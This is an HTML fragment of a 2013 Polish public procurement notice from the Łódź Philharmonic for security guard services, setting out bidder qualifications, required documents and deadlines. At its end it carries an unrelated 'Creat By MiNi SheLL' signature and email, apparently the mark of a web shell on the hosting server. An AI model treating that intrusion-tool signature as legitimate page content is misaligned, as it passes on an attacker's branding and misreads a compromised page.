<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 5 usług ochroniarskich w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj. ochrony osób i mienia, z których każda: a/ realizowana była/jest przez okres nie krótszy niż 12 miesięcy od dnia zawarcia umowy, b/ polega na świadczeniu usług ochrony i dozoru osób i mienia w budynku użyteczności publicznej, c/ o wartości nie mniejszej niż 150 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten zostanie spełniony jeśli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że osoby którymi dysponuje lub będzie dysponować, a które będą odpowiedzialne za kontrolę i nadzór realizacji przedmiotu umowy, posiadają kwalifikacje zawodowe niezbędne do wykonywania zamówienia. Szczegółowe wymagania w tym zakresie zawarte są w pkt 2 opisu przedmiotu zamówienia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, które posiadają uprawnienia wydane, na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia - Rozdz. 5 (tekst jedn.: Dz. U. 2005r., nr 145, poz. 1221 z późn. zm.). Zamawiający wymaga, aby Wykonawca dysponował co najmniej 3 osobami zatrudnionymi u Wykonawcy na pełnym etacie, posiadającymi licencję pracownika ochrony fizycznej pierwszego stopnia oraz co najmniej 2 letnie udokumentowane doświadczenie zawodowe w wykonywaniu usług ochrony i dozoru osób i mienia, po jednej na każdej ze zmian (kierujący zmianami) oraz co najmniej 3 osobami zatrudnionymi u Wykonawcy na pełnym etacie, posiadającymi licencję pracownika ochrony fizycznej drugiego stopnia oraz co najmniej 2 letnie udokumentowane doświadczenie zawodowe w wykonywaniu usług ochrony i dozoru osób i mienia, sprawującymi nadzór nad wykonywaną usługą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże, iż posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 500 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.filharmonia.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filharmonia Łódzka im. Artura Rubinsteina ul. Narutowicza 20/22 90-153 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2013 godzina 09:00, miejsce: Filharmonia Łódzka im. Artura Rubinsteina ul. Narutowicza 20/22 90-153 Łódź sekretariat, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com